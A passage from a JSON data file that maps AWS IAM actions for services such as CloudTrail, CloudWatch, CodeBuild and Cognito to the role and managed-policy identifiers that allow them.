{"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudsearch:describeAnalysisSchemes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudsearch:describeAvailabilityOptions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudsearch:describeDomains": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudsearch:describeExpressions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudsearch:describeIndexFields": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudsearch:describeScalingParameters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudsearch:describeServiceAccessPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudsearch:describeSuggesters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudsearch:listDomainNames": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudtrail:DescribeTrails": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"cloudtrail:GetTrailStatus": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"cloudtrail:describeTrails": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudtrail:getEventSelectors": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudtrail:getInsightSelectors": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudtrail:getTrail": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudtrail:getTrailStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudtrail:listPublicKeys": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudtrail:listTags": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudtrail:listTrails": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudtrail:lookupEvents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudwatch:*": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"cloudwatch:DeleteAlarms": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"cloudwatch:DescribeAlarms": {"roles": {"Allow": {"AROAIH747R37LKSEOZ2MA": {"Resource": {"*": {"policies": {"ANPAJSVXG6QHPE6VHDZ4Q": {"condition": null}}}}},"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"cloudwatch:GetMetricStatistics": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"cloudwatch:PutMetricAlarm": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"cloudwatch:describeAlarmHistory": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudwatch:describeAlarms": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudwatch:describeAlarmsForMetric": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudwatch:getDashboard": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudwatch:getMetricData": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudwatch:getMetricStatistics": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudwatch:listDashboards": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudwatch:listMetrics": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codeartifact:describeDomain": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codeartifact:describePackageVersion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codeartifact:describeRepository": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codeartifact:getDomainPermissionsPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codeartifact:getRepositoryEndPoint": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codeartifact:getRepositoryPermissionsPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codeartifact:listDomains": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codeartifact:listPackageVersionAssets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codeartifact:listPackageVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codeartifact:listPackages": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codeartifact:listRepositories": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codeartifact:listRepositoriesInDomain": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codebuild:batchGetBuildBatches": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codebuild:batchGetBuilds": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codebuild:batchGetProjects": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codebuild:listBuildBatches": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codebuild:listBuildBatchesForProject": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codebuild:listBuilds": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codebuild:listBuildsForProject": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codebuild:listCuratedEnvironmentImages": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codebuild:listProjects": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codebuild:listSourceCredentials": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codecommit:batchGetRepositories": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codecommit:getBranch": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codecommit:getRepository": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codecommit:getRepositoryTriggers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codecommit:listBranches": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codecommit:listRepositories": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:batchGetApplicationRevisions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:batchGetApplications": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:batchGetDeploymentGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:batchGetDeploymentInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:batchGetDeploymentTargets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:batchGetDeployments": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:batchGetOnPremisesInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:getApplication": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:getApplicationRevision": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:getDeployment": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:getDeploymentConfig": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:getDeploymentGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:getDeploymentInstance": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:getDeploymentTarget": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:getOnPremisesInstance": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:listApplicationRevisions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:listApplications": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:listDeploymentConfigs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:listDeploymentGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:listDeploymentInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:listDeploymentTargets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:listDeployments": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:listGitHubAccountTokenNames": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codedeploy:listOnPremisesInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codepipeline:getJobDetails": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codepipeline:getPipeline": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codepipeline:getPipelineExecution": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codepipeline:getPipelineState": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codepipeline:listActionExecutions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codepipeline:listActionTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codepipeline:listPipelineExecutions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codepipeline:listPipelines": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codepipeline:listWebhooks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codestar:describeProject": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codestar:listProjects": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codestar:listResources": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codestar:listTeamMembers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"codestar:listUserProfiles": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-identity:describeIdentityPool": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-identity:getIdentityPoolRoles": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-identity:listIdentities": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-identity:listIdentityPools": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:adminGetUser": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:describeIdentityProvider": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:describeResourceServer": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:describeRiskConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:describeUserImportJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:describeUserPool": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:describeUserPoolClient": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:describeUserPoolDomain": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:getGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:getUICustomization": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:getUser": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:getUserPoolMfaConfig": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:listGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:listIdentityProviders": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:listResourceServers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:listUserImportJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:listUserPoolClients": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-idp:listUserPools": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-sync:describeDataset": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-sync:describeIdentityPoolUsage": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-sync:describeIdentityUsage": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-sync:getCognitoEvents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-sync:getIdentityPoolConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-sync:listDatasets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cognito-sync:listIdentityPoolUsage": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"compute-optimizer:getAutoScalingGroupRecommendations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"compute-optimizer:getEC2InstanceRecommendations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"compute-optimizer:getEC2RecommendationProjectedMetrics": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"compute-optimizer:getEnrollmentStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"compute-optimizer:getRecommendationSummaries": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"config:describeConfigRuleEvaluationStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"config:describeConfigRules": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"config:describeConfigurationRecorderStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"config:describeConfigurationRecorders": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"config:describeDeliveryChannelStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"config:describeDeliveryChannels": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"config:getResourceConfigHistory": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"config:listDiscoveredResources": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"connect:describeUser": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"connect:getCurrentMetricData": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"connect:getMetricData": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"connect:listRoutingProfiles": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"connect:listSecurityProfiles": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"connect:listUsers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"controltower:describeAccountFactoryConfig": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"controltower:describeCoreService": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": 